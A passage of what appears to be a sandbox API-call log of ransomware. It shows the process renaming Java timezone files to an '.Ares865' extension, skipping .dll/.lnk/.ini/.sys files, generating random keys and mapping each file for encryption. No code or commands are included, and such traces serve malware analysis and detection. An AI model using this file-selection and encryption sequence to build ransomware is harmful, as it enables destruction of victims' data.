pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.347] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.347] lstrcpyW (in: lpString1=0x2cce460, lpString2="Marquesas" | out: lpString1="Marquesas") returned="Marquesas" [0133.348] lstrlenW (lpString="Marquesas") returned 9 [0133.348] lstrlenW (lpString="Ares865") returned 7 [0133.348] lstrcmpiW (lpString1="rquesas", lpString2="Ares865") returned 1 [0133.348] lstrlenW (lpString=".dll") returned 4 [0133.348] lstrcmpiW (lpString1="Marquesas", lpString2=".dll") returned 1 [0133.348] lstrlenW (lpString=".lnk") returned 4 [0133.348] lstrcmpiW (lpString1="Marquesas", lpString2=".lnk") returned 1 [0133.348] lstrlenW (lpString=".ini") returned 4 [0133.348] lstrcmpiW (lpString1="Marquesas", lpString2=".ini") returned 1 [0133.348] lstrlenW (lpString=".sys") returned 4 [0133.348] lstrcmpiW (lpString1="Marquesas", lpString2=".sys") returned 1 [0133.348] lstrlenW (lpString="Marquesas") returned 9 [0133.348] lstrlenW (lpString="bak") returned 3 [0133.348] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Marquesas.Ares865") returned 65 [0133.348] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Marquesas" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\marquesas"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Marquesas.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\marquesas.ares865"), dwFlags=0x1) returned 1 [0133.349] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Marquesas.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\marquesas.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.349] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0133.350] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.350] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.350] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.351] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x350, lpName=0x0) returned 0x170 [0133.353] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x350) returned 0x190000 [0133.353] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.354] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.354] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.355] lstrcpyW (in: lpString1=0x2cce460, lpString2="Midway" | out: lpString1="Midway") returned="Midway" [0133.355] lstrlenW (lpString="Midway") returned 6 [0133.355] lstrlenW (lpString="Ares865") returned 7 [0133.355] lstrlenW (lpString=".dll") returned 4 [0133.355] lstrcmpiW (lpString1="Midway", lpString2=".dll") returned 1 [0133.355] lstrlenW (lpString=".lnk") returned 4 [0133.355] lstrcmpiW (lpString1="Midway", lpString2=".lnk") returned 1 [0133.355] lstrlenW (lpString=".ini") returned 4 [0133.355] lstrcmpiW (lpString1="Midway", lpString2=".ini") returned 1 [0133.355] lstrlenW (lpString=".sys") returned 4 [0133.355] lstrcmpiW (lpString1="Midway", lpString2=".sys") returned 1 [0133.355] lstrlenW (lpString="Midway") returned 6 [0133.355] lstrlenW (lpString="bak") returned 3 [0133.355] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Midway.Ares865") returned 62 [0133.355] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Midway" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\midway"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Midway.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\midway.ares865"), dwFlags=0x1) returned 1 [0133.357] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Midway.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\midway.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.357] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=89) returned 1 [0133.357] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.358] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.358] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.358] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x360, lpName=0x0) returned 0x170 [0133.360] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x360) returned 0x190000 [0133.361] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.362] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.362] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.362] lstrcpyW (in: lpString1=0x2cce460, lpString2="Nauru" | out: lpString1="Nauru") returned="Nauru" [0133.362] lstrlenW (lpString="Nauru") returned 5 [0133.362] lstrlenW (lpString="Ares865") returned 7 [0133.362] lstrlenW (lpString=".dll") returned 4 [0133.362] lstrcmpiW (lpString1="Nauru", lpString2=".dll") returned 1 [0133.362] lstrlenW (lpString=".lnk") returned 4 [0133.362] lstrcmpiW (lpString1="Nauru", lpString2=".lnk") returned 1 [0133.362] lstrlenW (lpString=".ini") returned 4 [0133.362] lstrcmpiW (lpString1="Nauru", lpString2=".ini") returned 1 [0133.362] lstrlenW (lpString=".sys") returned 4 [0133.362] lstrcmpiW (lpString1="Nauru", lpString2=".sys") returned 1 [0133.362] lstrlenW (lpString="Nauru") returned 5 [0133.363] lstrlenW (lpString="bak") returned 3 [0133.363] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Nauru.Ares865") returned 61 [0133.363] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Nauru" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\nauru"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Nauru.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\nauru.ares865"), dwFlags=0x1) returned 1 [0133.364] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Nauru.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\nauru.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.364] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=97) returned 1 [0133.364] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.365] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.365] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.365] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x370, lpName=0x0) returned 0x170 [0133.367] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x370) returned 0x190000 [0133.368] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.368] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.368] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.369] lstrcpyW (in: lpString1=0x2cce460, lpString2="Niue" | out: lpString1="Niue") returned="Niue" [0133.369] lstrlenW (lpString="Niue") returned 4 [0133.369] lstrlenW (lpString="Ares865") returned 7 [0133.369] lstrlenW (lpString=".dll") returned 4 [0133.369] lstrlenW (lpString=".lnk") returned 4 [0133.369] lstrlenW (lpString=".ini") returned 4 [0133.369] lstrlenW (lpString=".sys") returned 4 [0133.369] lstrlenW (lpString="Niue") returned 4 [0133.369] lstrlenW (lpString="bak") returned 3 [0133.369] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Niue.Ares865") returned 60 [0133.369] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Niue" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\niue"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Niue.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\niue.ares865"), dwFlags=0x1) returned 1 [0133.371] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Niue.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\niue.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.371] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=89) returned 1 [0133.372] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.372] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.372] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.373] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x360, lpName=0x0) returned 0x170 [0133.375] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x360) returned 0x190000 [0133.375] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.376] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.376] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.376] lstrcpyW (in: lpString1=0x2cce460, lpString2="Norfolk" | out: lpString1="Norfolk") returned="Norfolk" [0133.377] lstrlenW (lpString="Norfolk") returned 7 [0133.377] lstrlenW (lpString="Ares865") returned 7 [0133.377] lstrlenW (lpString=".dll") returned 4 [0133.377] lstrcmpiW (lpString1="Norfolk", lpString2=".dll") returned 1 [0133.377] lstrlenW (lpString=".lnk") returned 4 [0133.377] lstrcmpiW (lpString1="Norfolk", lpString2=".lnk") returned 1 [0133.377] lstrlenW (lpString=".ini") returned 4 [0133.377] lstrcmpiW (lpString1="Norfolk", lpString2=".ini") returned 1 [0133.377] lstrlenW (lpString=".sys") returned 4 [0133.377] lstrcmpiW (lpString1="Norfolk", lpString2=".sys") returned 1 [0133.377] lstrlenW (lpString="Norfolk") returned 7 [0133.377] lstrlenW (lpString="bak") returned 3 [0133.377] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Norfolk.Ares865") returned 63 [0133.377] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Norfolk" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\norfolk"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Norfolk.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\norfolk.ares865"), dwFlags=0x1) returned 1 [0133.378] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Norfolk.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\norfolk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.378] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=77) returned 1 [0133.379] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.379] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.379] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.380] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x350, lpName=0x0) returned 0x170 [0133.381] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x350) returned 0x190000 [0133.382] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.383] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.383] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.383] lstrcpyW (in: lpString1=0x2cce460, lpString2="Noumea" | out: lpString1="Noumea") returned="Noumea" [0133.383] lstrlenW (lpString="Noumea") returned 6 [0133.383] lstrlenW (lpString="Ares865") returned 7 [0133.383] lstrlenW (lpString=".dll") returned 4 [0133.383] lstrcmpiW (lpString1="Noumea", lpString2=".dll") returned 1 [0133.383] lstrlenW (lpString=".lnk") returned 4 [0133.384] lstrcmpiW (lpString1="Noumea", lpString2=".lnk") returned 1 [0133.384] lstrlenW (lpString=".ini") returned 4 [0133.384] lstrcmpiW (lpString1="Noumea", lpString2=".ini") returned 1 [0133.384] lstrlenW (lpString=".sys") returned 4 [0133.384] lstrcmpiW (lpString1="Noumea", lpString2=".sys") returned 1 [0133.384] lstrlenW (lpString="Noumea") returned 6 [0133.384] lstrlenW (lpString="bak") returned 3 [0133.384] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Noumea.Ares865") returned 62 [0133.384] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Noumea" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\noumea"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Noumea.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\noumea.ares865"), dwFlags=0x1) returned 1 [0133.385] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Noumea.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\noumea.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.385] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=121) returned 1 [0133.386] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.386] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.386] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.386] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x380, lpName=0x0) returned 0x170 [0133.388] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x380) returned 0x190000 [0133.389] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.390] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.390] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.390] lstrcpyW (in: lpString1=0x2cce460, lpString2="Pago_Pago" | out: lpString1="Pago_Pago") returned="Pago_Pago" [0133.390] lstrlenW (lpString="Pago_Pago") returned 9 [0133.390] lstrlenW (lpString="Ares865") returned 7 [0133.390] lstrcmpiW (lpString1="go_Pago", lpString2="Ares865") returned 1 [0133.390] lstrlenW (lpString=".dll") returned 4 [0133.390] lstrcmpiW (lpString1="Pago_Pago", lpString2=".dll") returned 1 [0133.390] lstrlenW (lpString=".lnk") returned 4 [0133.390] lstrcmpiW (lpString1="Pago_Pago", lpString2=".lnk") returned 1 [0133.390] lstrlenW (lpString=".ini") returned 4 [0133.390] lstrcmpiW (lpString1="Pago_Pago", lpString2=".ini") returned 1 [0133.390] lstrlenW (lpString=".sys") returned 4 [0133.391] lstrcmpiW (lpString1="Pago_Pago", lpString2=".sys") returned 1 [0133.391] lstrlenW (lpString="Pago_Pago") returned 9 [0133.391] lstrlenW (lpString="bak") returned 3 [0133.391] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Pago_Pago.Ares865") returned 65 [0133.391] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Pago_Pago" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\pago_pago"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Pago_Pago.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\pago_pago.ares865"), dwFlags=0x1) returned 1 [0133.393] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Pago_Pago.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\pago_pago.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.393] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=77) returned 1 [0133.393] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.394] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.394] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.394] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x350, lpName=0x0) returned 0x170 [0133.396] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x350) returned 0x190000 [0133.396] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.397] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.397] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.398] lstrcpyW (in: lpString1=0x2cce460, lpString2="Palau" | out: lpString1="Palau") returned="Palau" [0133.398] lstrlenW (lpString="Palau") returned 5 [0133.398] lstrlenW (lpString="Ares865") returned 7 [0133.398] lstrlenW (lpString=".dll") returned 4 [0133.398] lstrcmpiW (lpString1="Palau", lpString2=".dll") returned 1 [0133.398] lstrlenW (lpString=".lnk") returned 4 [0133.398] lstrcmpiW (lpString1="Palau", lpString2=".lnk") returned 1 [0133.398] lstrlenW (lpString=".ini") returned 4 [0133.398] lstrcmpiW (lpString1="Palau", lpString2=".ini") returned 1 [0133.398] lstrlenW (lpString=".sys") returned 4 [0133.398] lstrcmpiW (lpString1="Palau", lpString2=".sys") returned 1 [0133.398] lstrlenW (lpString="Palau") returned 5 [0133.398] lstrlenW (lpString="bak") returned 3 [0133.398] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Palau.Ares865") returned 61 [0133.398] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Palau" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\palau"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Palau.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\palau.ares865"), dwFlags=0x1) returned 1 [0133.400] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Palau.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\palau.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.400] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0133.401] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.401] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.401] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.402] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x350, lpName=0x0) returned 0x170 [0133.403] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x350) returned 0x190000 [0133.404] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.405] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.405] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.405] lstrcpyW (in: lpString1=0x2cce460, lpString2="Pitcairn" | out: lpString1="Pitcairn") returned="Pitcairn" [0133.405] lstrlenW (lpString="Pitcairn") returned 8 [0133.405] lstrlenW (lpString="Ares865") returned 7 [0133.405] lstrcmpiW (lpString1="itcairn", lpString2="Ares865") returned 1 [0133.405] lstrlenW (lpString=".dll") returned 4 [0133.406] lstrcmpiW (lpString1="Pitcairn", lpString2=".dll") returned 1 [0133.406] lstrlenW (lpString=".lnk") returned 4 [0133.406] lstrcmpiW (lpString1="Pitcairn", lpString2=".lnk") returned 1 [0133.406] lstrlenW (lpString=".ini") returned 4 [0133.406] lstrcmpiW (lpString1="Pitcairn", lpString2=".ini") returned 1 [0133.406] lstrlenW (lpString=".sys") returned 4 [0133.406] lstrcmpiW (lpString1="Pitcairn", lpString2=".sys") returned 1 [0133.406] lstrlenW (lpString="Pitcairn") returned 8 [0133.406] lstrlenW (lpString="bak") returned 3 [0133.406] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Pitcairn.Ares865") returned 64 [0133.406] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Pitcairn" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\pitcairn"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Pitcairn.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\pitcairn.ares865"), dwFlags=0x1) returned 1 [0133.407] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Pitcairn.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\pitcairn.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.407] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=77) returned 1 [0133.408] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.408] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.408] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.408] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x350, lpName=0x0) returned 0x170 [0133.410] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x350) returned 0x190000 [0133.411] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.412] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.412] CryptReleaseContext (hProv=0x2f0518, 